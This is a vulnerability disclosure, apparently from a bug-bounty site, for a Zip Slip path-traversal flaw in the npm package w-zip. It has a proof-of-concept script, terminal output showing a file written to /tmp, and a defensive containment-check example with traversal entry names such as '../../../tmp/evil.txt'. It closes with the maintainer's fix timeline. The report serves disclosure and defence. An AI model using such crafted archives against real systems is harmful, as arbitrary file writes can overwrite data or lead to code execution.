Path Traversal in yuda-lyu/w-zip

Valid

Reported on Oct 11th 2021


Description

w-zip is vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip).

Proof of Concept

// poc.js

const wz = require('w-zip');

// Folder layout used by the PoC; the downloaded archive is expected at fpZip1
const fpUnzip = './testData/outputZip';
const fpUnzipExtract = fpUnzip + '/extract';
const fpZip1 = fpUnzip + '/zipslip.zip';

async function checkzipslip() {

    // unzip: every entry should stay inside fpUnzipExtract + '/zipslip'
    console.log('unzip1 before');
    console.log('unzip1', await wz.mZip.unzip(fpZip1, fpUnzipExtract + '/zipslip'));
    console.log('unzip1 after');

}

checkzipslip()
    .catch((err) => {
        console.log(err);
    });

Execute the following commands in the terminal:

1. npm i w-zip # Install affected module
2. A zipslip example file can be found at https://github.com/snyk/zip-slip-vulnerability/blob/master/archives/zip-slip.zip
3. node poc.js # Run the PoC

Output

┌─[user@parrot]─[~/node_modules/w-zip]
└──╼ $node  poc.js 
unzip1 before
unzip1 done: ./testData/outputZip/extract/zipslip
unzip1 after
┌─[user@parrot]─[~/node_modules/w-zip]
└──╼ $ls /tmp
evil.txt

Check the temp folder for the evil.txt file.

Impact

It may lead to Information Disclosure/DoS/RCE.
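
The check whose absence produces this class of bug, shown as an added example that is not code from w-zip or from its fix commit: a naive join of the entry name next to a containment check on the resolved path. The function names and the sample entry names are assumptions made for illustration.

```javascript
const path = require('path');

// Vulnerable pattern: the entry name is joined to the output folder as-is,
// so '../' segments stored in the archive climb out of destDir.
function naiveEntryPath(destDir, entryName) {
    return path.join(destDir, entryName);
}

// Hardened pattern: resolve the final path first, then require that it is
// still located below destDir before anything is written.
function safeEntryPath(destDir, entryName) {
    // Zip names use '/', but crafted archives may use '\' as well; treat
    // both as separators so the check behaves the same on every platform.
    const name = entryName.replace(/\\/g, '/');
    const root = path.resolve(destDir);
    const target = path.resolve(root, name);
    const rel = path.relative(root, target);
    const escapes = rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel);
    if (escapes) {
        throw new Error('entry escapes extraction folder: ' + entryName);
    }
    return target;
}

// Returns the entry names that an extractor should refuse to write.
function rejectedEntries(destDir, entryNames) {
    return entryNames.filter((name) => {
        try {
            safeEntryPath(destDir, name);
            return false;
        } catch (err) {
            return true;
        }
    });
}

// Constructed entry names for illustration, not read from a real archive.
const sampleEntries = [
    'good.txt',
    'docs/readme.txt',
    '..notes/file.txt',          // legitimate name that merely starts with '..'
    '../../../tmp/evil.txt',     // relative traversal
    '/tmp/evil.txt',             // absolute path
    '..\\..\\tmp\\evil.txt',     // backslash traversal
];

console.log(naiveEntryPath('./extract/zipslip', '../../../tmp/evil.txt'));
console.log(rejectedEntries('./extract/zipslip', sampleEntries));
```

An extractor would call the containment check for every entry before creating any file or directory, and abort or skip on the first rejected name.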

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md (2 months ago)
We have contacted a member of the yuda-lyu/w-zip team and are waiting to hear back (2 months ago)
We have sent a second follow up to the yuda-lyu/w-zip team. We will try again in 10 days. (a month ago)

sheldor2021
a month ago

Researcher


Thanks @admin

sheldor2021
a month ago

Researcher


@admin I see the @maintainer has added a commit - https://github.com/yuda-lyu/w-zip/commit/d7039d034e02fa358e6656565157cedf5fa83288 3 days back which fixes the issue reported here. However, he has not approved the issue here. Can you please look into this?

Jamie Slome
a month ago

Admin


I have dropped a message on the GitHub Issue, and 🤞 the maintainer will get back to us shortly.

yuda-lyu validated this vulnerability (a month ago)
sheldor2021 has been awarded the disclosure bounty
The fix bounty is now up for grabs
yuda-lyu confirmed that a fix has been merged on d7039d (a month ago)
The fix bounty has been dropped
mZip.mjs#L266 has been validated